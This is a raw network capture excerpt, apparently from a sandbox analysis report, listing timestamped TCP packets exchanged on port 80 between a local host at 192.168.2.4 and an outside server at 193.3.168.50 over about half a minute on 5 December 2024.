                                                                                                                  Dec 5, 2024 10:54:04.576601028 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.335057974 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.377723932 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.573086977 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.627616882 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.685853958 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.686168909 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.805866957 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.805953026 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.806121111 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.806138039 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.806204081 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.929223061 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.159145117 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.278987885 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.816591978 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.816673994 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.936503887 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.936578035 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.937311888 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.937504053 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.938783884 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.939593077 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.058481932 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.059396982 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.059544086 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.059884071 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.179558039 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.284147024 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.403945923 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.406651020 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.408967972 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.529856920 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.175604105 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.221381903 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.298099995 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.346390009 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.409806013 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.458518982 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.533394098 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.580729961 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.928621054 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.929025888 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.929150105 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.048721075 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.048782110 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.048832893 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.048906088 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.049104929 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.049263954 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.049316883 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.169317007 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.393372059 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.513077974 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.287276983 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.330741882 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.521159887 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.565376997 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.644793034 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.764688969 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.765209913 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.765209913 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.885003090 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:11.112150908 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:11.231983900 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.002557993 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.049494028 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.237816095 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.283864975 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.360265017 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.360296965 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480114937 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.480635881 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.480722904 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480734110 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480917931 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.600589991 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.830893040 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.951128006 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.425530910 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.425852060 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.543184996 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.546737909 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.546849966 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.546973944 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.547054052 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.547111988 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.549285889 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.666688919 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.668977022 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.669105053 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.669290066 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.788898945 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.937997103 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.048043966 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.057769060 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.057837963 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.168317080 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.785610914 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.830746889 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.907636881 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.955756903 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.021601915 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.065104961 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.141366959 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.190126896 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.266954899 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.267471075 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.267956018 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387212992 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387331963 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387686014 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387722015 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387739897 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387804031 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.388012886 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.507657051 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.737174988 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.856930971 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:16.625627995 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:16.674504995 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:16.861372948 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:16.908973932 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.033740997 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.034343004 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.153973103 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:17.154081106 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.154088974 CET8049835193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:17.154169083 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.154334068 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.273978949 CET8049835193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:17.502710104 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:17.622493982 CET8049835193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:18.393225908 CET8049835193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:18.440114021 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:18.629383087 CET8049835193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:18.674495935 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:18.754827023 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:18.874644995 CET8049841193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:18.875077009 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:18.875300884 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:18.996150970 CET8049841193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:19.221476078 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:19.341434956 CET8049841193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.035079956 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.035214901 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.113811970 CET8049841193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.113867998 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.154841900 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.154917002 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.155073881 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.155261993 CET8049841193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.155308962 CET4984180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.156754971 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.274751902 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.276416063 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.276479006 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.276611090 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.396317959 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.502754927 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.622591019 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.622613907 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:20.627729893 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:20.748953104 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:21.393438101 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:21.440124035 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.515396118 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:21.565130949 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.629386902 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:21.674506903 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.749331951 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:21.799509048 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.879806042 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.879884958 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.880692959 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:21.999988079 CET8049842193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:22.000046015 CET4984280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:22.000463009 CET8049844193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:22.000505924 CET4984480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:22.000560045 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:22.000633955 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:22.000765085 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:22.121051073 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:22.346514940 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:22.466310024 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:23.239417076 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:23.283884048 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.473486900 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:23.518254042 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.625763893 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.626118898 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.643695116 CET4983580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.746633053 CET8049855193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:23.746700048 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.746805906 CET8049849193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:23.746857882 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.746859074 CET4984980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:23.866554022 CET8049855193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:24.096457005 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:24.216681957 CET8049855193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:24.985985994 CET8049855193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:25.033895969 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.221291065 CET8049855193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:25.268265963 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.342168093 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.462220907 CET8049861193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:25.462359905 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.462532997 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.582459927 CET8049861193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:25.815372944 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:25.937113047 CET8049861193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.644435883 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.644650936 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.700790882 CET8049861193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.700845003 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.764204979 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.764256001 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.764516115 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.764786959 CET8049861193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.764831066 CET4986180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.783737898 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.884690046 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.903412104 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:26.903472900 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:26.903601885 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:27.023570061 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:27.112154961 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:27.231942892 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:27.231983900 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:27.252861023 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:27.372713089 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.002809048 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.049544096 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.141382933 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.190136909 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.237238884 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.283912897 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.373301029 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.424551964 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.542870998 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.542944908 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.543247938 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.662976027 CET8049863193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.662992001 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.663038015 CET4986380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.663081884 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.663238049 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.663353920 CET8049867193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:28.663414955 CET4986780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:28.782953978 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:29.018651962 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:29.138639927 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:29.900537014 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:29.955787897 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.133487940 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:30.174526930 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.247690916 CET4985580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.247782946 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.247864008 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.252315044 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.252707958 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.373420954 CET8049869193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:30.373492002 CET4986980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.373557091 CET8049875193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:30.373629093 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.373761892 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.493458986 CET8049875193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:30.721587896 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:30.841356993 CET8049875193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:31.612174034 CET8049875193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:31.658937931 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:31.845249891 CET8049875193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:31.893291950 CET4987580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:31.968871117 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:32.088670969 CET8049881193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:32.089644909 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:32.089801073 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:32.209647894 CET8049881193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:32.440354109 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:32.560295105 CET8049881193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.264539957 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.327086926 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.327554941 CET8049881193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.327606916 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.384382010 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.386863947 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.389946938 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.447200060 CET8049881193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.447248936 CET4988180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.509627104 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.564383984 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.684158087 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.684235096 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.684422970 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.737289906 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:33.804322004 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.857237101 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:33.857256889 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:34.034198046 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:34.154093981 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:34.626430988 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:34.674542904 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:34.861550093 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:34.908914089 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:34.934099913 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:34.987287998 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.169424057 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:35.221416950 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.296947002 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.296947002 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.297266006 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.416986942 CET8049890193.3.168.50192.168.2.4
